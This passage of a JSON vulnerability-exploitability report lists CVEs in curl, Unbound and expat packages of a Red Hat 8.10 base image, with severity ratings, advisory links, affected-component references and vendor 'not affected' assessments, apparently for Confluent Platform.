          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4873"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4873"
        }
      ],
      "published": "2026-05-13T13:01:55+00:00",
      "updated": "2026-06-17T10:57:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-50046",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "In NLnet Labs Unbound 1.15.0 up to and including 1.25.1, the TLS server name used for DNS-over-TLS (DoT) forwarded queries is tied to a struct's ('serviced_query') lifetime but also referenced by another struct ('waiting_tcp'). When the owning struct is jostled out of the mesh while the DoT TCP stream is still handshaking it frees the storage behind the referenced string and if the TLS stream then errors out, it dereferences the freed pointer. The dereference is read-only and the practical impact is a daemon crash resulting in denial of service. A malicious actor that knows a DoT forwarding/stub Unbound's configuration could exploit the vulnerability by quering records in the appropriate zone while keeping Unbound uder pressure so that the jostle logic kicks in. If answers for the vulnerable zone are slow, the likelihood of jostling such queries is higher, although the timing of the jostle needs to be precise. Requirements for a vulnerable Unbound is the existence of a stub/forward zone configured for DoT together with a configured '#authname' suffix on the server identification. The connectivity to the server needs to exhibit a transient failure at the correct time in order to kick off the vulnerable error path.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-50046"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-50046"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50046"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50046"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-50046.txt"
        }
      ],
      "published": "2026-07-22T14:17:20+00:00",
      "updated": "2026-07-24T13:55:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-50219",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 lacks handler call depth tracking for calls to XML_GetBuffer, XML_Parse, XML_ParseBuffer, XML_ParserFree, or XML_ParserReset from within handlers in cases of a policy violation. Thus, a use-after-free can occur,",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-50219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-50219"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1246"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50219"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50219"
        }
      ],
      "published": "2026-06-04T06:16:25+00:00",
      "updated": "2026-07-22T20:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-50251",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        184
      ],
      "description": "In NLnet Labs Unbound up to and including version 1.25.1, when 'unwanted-reply-threshold' is enabled (set to any value greater than zero), glue records of 0.0.0.0/::0 can short-circuit Unbound, on systems that can direct such traffic, by issuing DNS queries and receiving seemingly unwanted replies since the remote IP does not match the original source IP of 0.0.0.0/::0. This behavior keeps on looping for the glue records and pushing the counter to the configured 'unwanted-reply-threshold' that triggers a defensive cache clear. A malicious actor who controls a delegation that returns in-bailiwick glue of 0.0.0.0/::0 can drive the counter to the limit of 'unwanted-reply-threshold' to the threshold and trigger a cache clean of the message and rrset caches; at will, indefinitely, without sending a single spoofed packet. The iterator uses the 0.0.0.0/::0 glue, and a system that can route this (e.g., Linux kernel routes the datagram over loopback), Unbound's own listener answers from 127.0.0.1. Because of the mismatch of 0.0.0.0 and 127.0.0.1, in this example, Unbound accounts the reply as an unwanted (probably spoofed) answer. The counter resets to zero on every cache flush, so the attack loops forever.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-50251"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-50251"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50251"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50251"
        },
        {
          "url": "https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-50251.txt"
        }
      ],
      "published": "2026-07-22T14:17:20+00:00",
      "updated": "2026-07-24T14:05:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
